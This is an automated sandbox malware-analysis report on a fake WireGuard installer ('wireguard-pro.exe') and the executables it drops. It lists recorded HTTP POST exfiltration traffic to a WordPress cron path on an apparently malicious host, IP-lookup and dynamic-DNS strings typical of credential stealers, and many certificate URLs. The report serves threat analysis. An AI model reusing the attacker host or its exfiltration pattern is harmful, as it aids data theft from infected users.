Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 112858Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 324Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 112878Expect: 100-continue

Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, audddd.exe, 00000012.00000002.1130043330.00000000030AA000.00000004.00000800.00020000.00000000.sdmp, audddd.exe.3.dr	String found in binary or memory: http://DynDns.com
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, audddd.exe, 00000012.00000002.1130043330.00000000030AA000.00000004.00000800.00020000.00000000.sdmp, audddd.exe.3.dr	String found in binary or memory: http://Paltalk.com
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620792893.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr, MSIC895.tmp.4.dr, 51c702.msi.4.dr, 7ABGVF6Q.exe.0.dr	String found in binary or memory: http://aia.entrust.net/evcs2-chain.p7c01
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.618947019.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636785366.0000000003970000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr	String found in binary or memory: http://aia.entrust.net/ts2-chain256.cer01
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: audddd.exe, 00000011.00000002.821401870.0000000002E23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: audddd.exe, 00000011.00000002.821401870.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000011.00000002.821401870.0000000002E23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: HQL82NEF.exe, 00000003.00000002.1130370284.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000011.00000002.821401870.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, audddd.exe.3.dr	String found in binary or memory: http://checkip.dyndns.org/E
Source: HQL82NEF.exe, 00000003.00000002.1129347191.0000000001031000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/H
Source: 7ABGVF6Q.exe, 00000002.00000002.636785366.0000000003970000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.ne
Source: 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/csbr1.crl
Source: 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/csbr1.crl&
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636785366.0000000003970000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000007.00000002.638405462.000001D1E3F38000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr	String found in binary or memory: http://crl.entrust.net/csbr1.crl0
Source: 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/csbr1.crl2
Source: 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/csbr1.crlZ
Source: 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/evcs2.crl
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620792893.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr, MSIC895.tmp.4.dr, 51c702.msi.4.dr, 7ABGVF6Q.exe.0.dr	String found in binary or memory: http://crl.entrust.net/evcs2.crl0
Source: 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/evcs2.crl8
Source: 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/evcs2.crlv
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr, MSIC895.tmp.4.dr	String found in binary or memory: http://crl.entrust.net/g2ca.crl0
Source: 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/ts2ca.crl
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr	String found in binary or memory: http://crl.entrust.net/ts2ca.crl0
Source: wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1129347191.0000000001031000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000002.1131825432.0000028D9BF68000.00000004.00000020.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1129439699.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.801790900.000002034AD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.815564651.000002034AD0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.797232304.000002034AD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.815168989.000002034AD0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wireguard.exe, 00000009.00000002.1132736589.0000028DC1EAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsof
Source: svchost.exe, 0000001C.00000002.815507931.000002034A4E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wireguard-pro.exe, 00000000.00000002.618873616.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wireguard-pro.exe, 00000000.00000002.618873616.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enKUi
Source: wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, audddd.exe, 00000012.00000002.1130043330.00000000030AA000.00000004.00000800.00020000.00000000.sdmp, audddd.exe.3.dr	String found in binary or memory: http://no-ip.com
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net
Source: 7ABGVF6Q.exe, 00000002.00000003.636569317.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net/
Source: 7ABGVF6Q.exe, 00000002.00000003.620363819.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, A9B13BCD41ACB49316A37129BE941FFA_BD22E51CB23A085126973E3A7E5399780.2.dr	String found in binary or memory: http://ocsp.entrust.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQXoCibpolAJkHkrE10coCb1HRkIAQUJg%2FwxEgIG83dkf
Source: 7ABGVF6Q.exe, 00000002.00000003.620370009.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619645470.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620008640.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620792893.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRp%2BmQDKauE4nIg%2FgknZHuBlLkfKgQUzolPglGqFaKE
Source: 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619340546.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 026A86A161D256DBB33076EDF20C0E5E_8372263305412A8ACAD18CE348CFB7C80.2.dr, 026A86A161D256DBB33076EDF20C0E5E_86AB612B21DEDF3B8CD155ED2E4114FF0.2.dr	String found in binary or memory: http://ocsp.entrust.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRr2bwARTxMtEy9aspRAZg5QFhagQQUgrrWPZfOn89x6JI3
Source: 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTLXNCzDvBhHecWjg70iJhBW0InywQUanImetAe733nO2lR
